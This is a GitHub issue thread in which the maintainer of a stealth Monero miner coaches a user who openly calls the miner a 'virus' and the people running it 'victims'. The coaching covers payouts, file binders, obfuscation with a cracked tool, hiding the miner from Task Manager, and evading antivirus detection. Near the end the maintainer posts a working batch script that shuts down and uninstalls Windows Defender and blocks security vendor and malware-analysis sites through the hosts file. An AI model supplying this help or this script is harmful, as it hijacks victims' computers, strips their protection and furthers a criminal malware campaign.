### ISSUE TITLE
Minimum payout

### ISSUE THREAD

**Issue by WexisQ** [UnamSanctam/SilentXMRMiner#230]
sorry for my ban english. in the nanopool Minimum payout is 1 XMR, 1 xmr so big limit. I have around 2000 mines but still I make very hard money. How do I get the minimum payment limit to 0.1 xmr.

**Comment by UnamSanctam** [comment]
To change the minimum payout just create a separate build that contains an email (password), you can do this by entering it into the wallet address section in this format `YOUR_XMR_ADDRESS.YOUR_WORKER/YOUR_EMAIL`, for example: `WALLET.Test/password`. And then if you mine at least 10 shares on your own computer with that build then you should be able to change the minimum payout by entering `password` as the password.

**Comment by WexisQ** [comment]
I have about 2000 miners now and I have money in nanopool will they go to waste?

**Comment by UnamSanctam** [comment]
No no, the miners or money won't be affected, it will just mine to a new worker with a password that you can then use and just close down that miner, it only has to be run on for example your computer to mine 10 shares. Do you currently mine with any worker names and do you mine directly to the pool?

**Comment by WexisQ** [comment]
I don't have any mine with a name right now.

**Comment by UnamSanctam** [comment]
Yeah ok that will make it easier, just download this: [xmrig-6.12.1.zip](https://github.com/UnamSanctam/SilentXMRMiner/files/6414276/xmrig-6.12.1.zip) and edit the start.bat file and replace `YOURXMRWALLET` with the wallet address you mine to. After that just run `start.bat` and let it mine at least 10 shares (so that the worker will say that it has 10 rating on Nanopool) and then you can change the minimum payout using the password: `password`.

**Comment by WexisQ** [comment]
I did as you said, but miners seems offline. I also write "password" instead of password, I did not change anything, I just wrote my xmr wallet instead of YOURXMRWALLET

**Comment by WexisQ** [comment]
![Capture](https://user-images.githubusercontent.com/83571493/116867477-f8990280-ac15-11eb-86c0-f8de58e7a110.PNG)

**Comment by WexisQ** [comment]
![Uploading Capture.PNG…]()

**Comment by WexisQ** [comment]
![Uploading 1.PNG…]()

**Comment by WexisQ** [comment]
okay 1 mine is online now. do I turn this on 10 times on my own computer? my computer won't crash, right

**Comment by WexisQ** [comment]
![Capture](https://user-images.githubusercontent.com/83571493/116867944-8ffe5580-ac16-11eb-9108-2e3c3383ea95.PNG)

**Comment by UnamSanctam** [comment]
Uh, well close down the other two ones since you should only have 1 running (the one with a lot of 'new job' messages I see in your screenshot), after it has mined 10 shares the rating should also show 10 on Nanopool. You can how many shares it has mined by focusing on the window and pressing 'S'.

**Comment by WexisQ** [comment]
I will ask something more, there are interruptions in miners, they suddenly stop working, what is the reason?
![Uploading Capture.PNG…]()

**Comment by WexisQ** [comment]
![Uploading Capture.PNG…]()
![image](https://user-images.githubusercontent.com/83571493/116868916-562e4e80-ac18-11eb-9f75-5785ab139e63.png)
I will ask something more, there are interruptions in miners, they suddenly stop working, what is the reason?

**Comment by UnamSanctam** [comment]
Maybe turning off their computers or opening Task Manager if you have 'Stealth' enabled.

**Comment by WexisQ** [comment]
Can you recommend a file binder (exe) program or link also thank you very much for your help

**Comment by UnamSanctam** [comment]
Well there's a lot of them if you search Google but the one I tried (which is technically only educational but still works fine if you also obfuscate the file it creates) was https://github.com/Paskowsky/Dream-AIO. You technically need to compile it yourself but here is a version that I already compiled if don't want to compile it yourself: [Dream AIO.zip](https://github.com/UnamSanctam/SilentXMRMiner/files/6414604/Dream.AIO.zip)

**Comment by WexisQ** [comment]
![1](https://user-images.githubusercontent.com/83571493/116873652-b88b4d00-ac20-11eb-9912-9e7a416b09d2.PNG)
how can ı fud

**Comment by UnamSanctam** [comment]
https://github.com/UnamSanctam/SilentXMRMiner/wiki#how-can-i-decrease-detections

**Comment by WexisQ** [comment]
Can you briefly explain what is a block?
![Capture](https://user-images.githubusercontent.com/83571493/116876205-c347e100-ac24-11eb-9661-eaf57899b8f1.PNG)

**Comment by UnamSanctam** [comment]
A block is the thing that contains all the transaction in the blockchain. Blocks are what you are technically solving when mining.

**Comment by WexisQ** [comment]
If I have too many miners, does it only accept 10 blocks?

**Comment by UnamSanctam** [comment]
No no, blocks aren't a thing you mine yourself on pools, mining a block requires a lot of hashing power which is why we use pools that split up mining of a block into shares. You can just ignore what your image is saying, all it says is that the unconfirmed balance in that window hasn't been verified yet but will be after 10 block confirmations on the blockchain.

**Comment by WexisQ** [comment]
![1](https://user-images.githubusercontent.com/83571493/116888884-a3b8b480-ac34-11eb-95b0-6a39475f983b.PNG)
Why always like this. I don't think miners are shutting down your computers

**Comment by UnamSanctam** [comment]
Oh, that is normal, you should check average hashrate over a longer time for the real hashrate due to the luck based nature of mining. Read this: https://help.nanopool.org/article/62-faq#6.-hashrate

**Comment by WexisQ** [comment]
it seems that miners are working on the graph but the Unconfirmed Balance or balance also does not appear for hours. is that normal ?

**Comment by UnamSanctam** [comment]
If it shows that your miners are mining then everything is working. The balances will change whenever the pool succesfully mines a block and it will give a divident depending on how much total shares you had.

**Comment by WexisQ** [comment]
The miners got smaller the next day. Could the reason be that the virus was deleted by the defender?

**Comment by WexisQ** [comment]
Is eth or xmr more profitable ? I have about 150-300 active mining now, but I get an average of 5.000 h / s. Is this the normal? what do you think

**Comment by UnamSanctam** [comment]
ETH is more profitable but only works on some computers since it has high GPU requirements while XMR works on nearly all computers so they usually even out if you spread it a lot. 150-300 miners should get a lot more than 5000 H/s so if possible you should probably check the miners if you have access to them. If you are checking the amount of miners by downloads then that number usually isn't that accurate.

**Comment by WexisQ** [comment]
How many h/s do you think it should take 150-200 active miner on average?

**Comment by UnamSanctam** [comment]
Well, the mining speed per computer depends on the CPU and the Max CPU/Idle CPU you set but usually they all at least mine at 200-500 H/s each so you should at least have like 50 000-100 000 H/s unless all the CPUs are really bad.

**Comment by WexisQ** [comment]
The virus I made has 385 downloads in total and I set the miners cpu value to 30%, but now I am getting 8k h / s. What is the reason?

**Comment by UnamSanctam** [comment]
Either their antivirus removed it (though most people only have Windows Defender so if you obfuscated it enough to avoid that it should be fine, you can also obfuscate the watchdog as well https://github.com/UnamSanctam/SilentXMRMiner/wiki#custom-watchdog) or they never started it or the download counter might not be very reliable.

**Comment by WexisQ** [comment]
I think the download counter is showing correct, but look at my settings so low 6k h / s, is there a mistake? So how do you think the settings should be because 6k is too low for 200 people.
![1](https://user-images.githubusercontent.com/83571493/117108584-17b9a080-ad8c-11eb-8969-907d19ba39d3.PNG)
![2](https://user-images.githubusercontent.com/83571493/117108590-18eacd80-ad8c-11eb-9b82-d466771d8d91.PNG)
![3](https://user-images.githubusercontent.com/83571493/117108597-1a1bfa80-ad8c-11eb-9a46-9d21363305d3.PNG)
![4](https://user-images.githubusercontent.com/83571493/117108601-1be5be00-ad8c-11eb-843e-43d1825429a9.PNG)

**Comment by UnamSanctam** [comment]
No that should work, what that sounds like is that the antiviruses remove the miner for most users so you have around 10-40 miners. Try enabling 'Custom Watchdog' https://github.com/UnamSanctam/SilentXMRMiner/wiki#custom-watchdog and obfuscate both the watchdog and the miner with different settings.

**Comment by WexisQ** [comment]
I am a inexperienced in this matter. Can you explain in a little detail. I should also use ssl / tts, what does it do? also how should my settings be here
![Capture](https://user-images.githubusercontent.com/83571493/117111206-ee9b0f00-ad8f-11eb-81c4-877ed6510384.PNG)
Can you help with how the settings should be

**Comment by UnamSanctam** [comment]
SSL/TLS will encrypt your connection which is preferred so you can enable that but remember to use the SSL/TLS port (which is 14433 for Nanopool). Just enable 'Custom Watchdog' there and it will pause the builder so that you can obfuscate the Watchdog before it gets imbedded into the miner.

**Comment by WexisQ** [comment]
As you said, I just opened the "Custom Watchdog" and I made the settings as follows, are these correct? And when I do these settings, a warning comes when I run the virus. Can we turn it off. And how should the .net settings be?
![Capture](https://user-images.githubusercontent.com/83571493/117112442-bac0e900-ad91-11eb-8527-89f51f82ade7.PNG)

**Comment by UnamSanctam** [comment]
Those settings should work but keep in mind that sometimes Windows Defender detects NecroBit and Anti ILDASM. What kind of warning? SmartScreen?

What do you mean decreasing? You already use the Watchdog in your current miner, now you are just obfuscating it.

**Comment by WexisQ** [comment]
then I close NecroBit  and ILDASM ok ?

no, Now I did the virus again by opening the 'Custom Watchdog' and I will spread it. I mean by saying decreasing I hope this time miners don't decrease

Also, is there a different setting I need to do? I also activated idle mining, what else can I do to prevent my miners from decreasing. By the way, I chose svchost so could it be decreasing

**Comment by WexisQ** [comment]
I'm going to ask something, just suddenly, h / s 17k, now it goes up from 7-9k suddenly and fluctuates, is that why?

**Comment by WexisQ** [comment]
![Capture](https://user-images.githubusercontent.com/83571493/117113529-3f603700-ad93-11eb-95ee-9e2e47f36575.PNG)
When I opened the Custom Watchdog , such a file was created and there is 1 more virus like the one I made, which one should I use?

**Comment by UnamSanctam** [comment]
Well mining is quite random but checking the average it the most accurate. But try enabling 'Stealth' as well since it will hide from Task Manager since when users check TaskmManager the CPU usage can be quite a giveaway that there's a miner or something wrong. Svchost should work but you could try something like explorer.exe to be safe.

Copy the file inside that folder and replace the normal Watchdog file with it.

**Comment by WexisQ** [comment]
i turned on the stealth option and don't run it on my own computer how can i be sure it is running in the background and how do i delete this virus on also custom watcgos is on How do I delete this from my computer

**Comment by WexisQ** [comment]
also the file is not deleted the victim is suspected how to fix it
![Capture](https://user-images.githubusercontent.com/83571493/117119053-36269880-ad9a-11eb-882b-d3ff7e8addcc.PNG)

**Comment by WexisQ** [comment]
It gives this warning every 1 minute, what should I do?
![Capture](https://user-images.githubusercontent.com/83571493/117119234-71c16280-ad9a-11eb-9b4e-8c781cda5851.PNG)

**Comment by UnamSanctam** [comment]
You need to replace the dotNET_Reactor.exe with the cracked version inside the Crack folder. To check whether the miner is working just compile it once without 'Stealth' and if it works just enable 'Stealth' and compile it again. To remove the miner follow this: https://github.com/UnamSanctam/SilentXMRMiner/wiki#how-do-i-remove-the-miner

**Comment by WexisQ** [comment]
There is no crack folder I downloaded it from the internet

**Comment by UnamSanctam** [comment]
I linked the cracked version in the guide here: https://github.com/UnamSanctam/SilentXMRMiner/wiki#how-can-i-decrease-detections but if you don't want to use that you would have to use some free obfuscator like ConfuserEx.

**Comment by WexisQ** [comment]
also the file is not deleted the victim is suspected how to fix it

**Comment by UnamSanctam** [comment]
What? Close down the program before deleting it.

**Comment by WexisQ** [comment]
it's already off but I can't delete it, also won't the victim suspect it?

**Comment by UnamSanctam** [comment]
Which one? Sihost64.exe? There's no real reason to suspect that. And if you can't delete it that means it's still running.

**Comment by WexisQ** [comment]
![Capture](https://user-images.githubusercontent.com/83571493/117128489-257c1f80-ada6-11eb-8f7c-768ddce49a24.PNG)
stil detect

**Comment by UnamSanctam** [comment]
Yeah usually you have to test different obfuscator settings until it becomes undetected. Sometimes rebuilding the miner works as well since it will encrypt everything differently every time.

**Comment by WexisQ** [comment]
can you show me the settings what i do i don't work

**Comment by UnamSanctam** [comment]
It's always different since the obfuscations and final results are random and it also depends on if the antivirus has gotten some sort of update then different settings will give different results.

**Comment by WexisQ** [comment]
![Capture](https://user-images.githubusercontent.com/83571493/117130460-c4a21680-ada8-11eb-8b37-30c763a53397.PNG)
I've tried all kinds of things, it just never happens, always perceives

**Comment by UnamSanctam** [comment]
Some options will increase some detections and some will decrease some. In the worst case it can be easier to find another obfuscator since so many use it and thus it increases the detections.

**Comment by WexisQ** [comment]
please help me on the internet crypter i can't find It doesn't happen in any way, it's always detected

**Comment by UnamSanctam** [comment]
Are the detections different every time?

**Comment by WexisQ** [comment]
yes it changes according to the crypter programs but it is always detecting

**Comment by WexisQ** [comment]
I made such a setting. it does not catch antiviruses but when I start the virus the virus doesn't work

**Comment by WexisQ** [comment]
![Capture](https://user-images.githubusercontent.com/83571493/117135152-354c3180-adaf-11eb-94be-fb2d793fc333.PNG)
![Capt2ure](https://user-images.githubusercontent.com/83571493/117135161-367d5e80-adaf-11eb-917f-e130ec9e8a67.PNG)
I made such a setting that it is not caught by antiviruses but it does not work when I run the virus

**Comment by UnamSanctam** [comment]
Yeah the "Compress & Encrypt resources" might do that. If you press the cogwheel next to the option there might be som setting that won't break it.

**Comment by WexisQ** [comment]
I tried all the options. What should I do? I tried crypters on the internet, but it doesn't work. Do you want to tell your own way

**Comment by UnamSanctam** [comment]
The way I did it was to create a .bat file that "kills" Windows Defender and bind that with the miner with a file binder and when that .bat file ran before the miner it would allow the miner to be used freely since the antivirus was "dead" when the miner ran.

Here is the .bat code I wrote:
```
powershell -Command Add-MpPreference -ExclusionPath '%cd%'
powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%'
powershell -Command Add-MpPreference -ExclusionPath '%AppData%'
powershell -Command Add-MpPreference -ExclusionPath '%Temp%'
powershell -Command Set-MpPreference -DisableArchiveScanning $true
powershell -Command Set-MpPreference -DisableBehaviorMonitoring $true
powershell -Command Set-MpPreference -DisableRealtimeMonitoring $true
powershell -Command Set-MpPreference -DisableScriptScanning $true
powershell -Command Set-MpPreference -DisableIntrusionPreventionSystem $true
powershell -Command Set-MpPreference -DisableIOAVProtection $true
powershell -Command Set-MpPreference -EnableControlledFolderAccess Disabled
powershell -Command Set-MpPreference -EnableNetworkProtection AuditMode -Force
powershell -Command Set-MpPreference -MAPSReporting Disabled
powershell -Command Set-MpPreference -SubmitSamplesConsent NeverSend
powershell New-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force
sc config WinDefend start=disabled
sc stop WinDefend
powershell -Command Stop-Service WinDefend 
powershell -Command Set-Service WinDefend -StartupType Disabled
powershell -Command Uninstall-WindowsFeature -Name Windows-Defender
powershell -Command Remove-WindowsFeature Windows-Defender, Windows-Defender-GUI
Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet
echo 127.0.0.1       www.malwarebytes.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       malwarebytes.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       avast.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.avast.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.mcafee.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       mcafee.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.kaspersky.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       kaspersky.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.norton.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       norton.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       microsoft.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.microsoft.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       any.run >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.any.run >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       virustotal.com >> "%SystemRoot%\System32\drivers\etc\hosts"
echo 127.0.0.1       www.virustotal.com >> "%SystemRoot%\System32\drivers\etc\hosts"
```

**Comment by WexisQ** [comment]
thanks what exactly do i need to do this ?

**Comment by WexisQ** [comment]
please let help to encrypt

**Comment by UnamSanctam** [comment]
Well, to use the .bat file you would just have to create it and bind it first before the other file though making the window invisible might be a bit harder.

**Comment by WexisQ** [comment]
This is what I don't understand. ok i bind with the .bat file but already when the virus is downloaded from the internet the defender deletes it automatically

**Comment by UnamSanctam** [comment]
If it's bound with a file binder then the miner will be encrypted inside the program so the antivirus wouldn't be able to read it and thus can't detect it. You will probably have to obfuscate the bound file though since that might have some detections since it's a dropper.
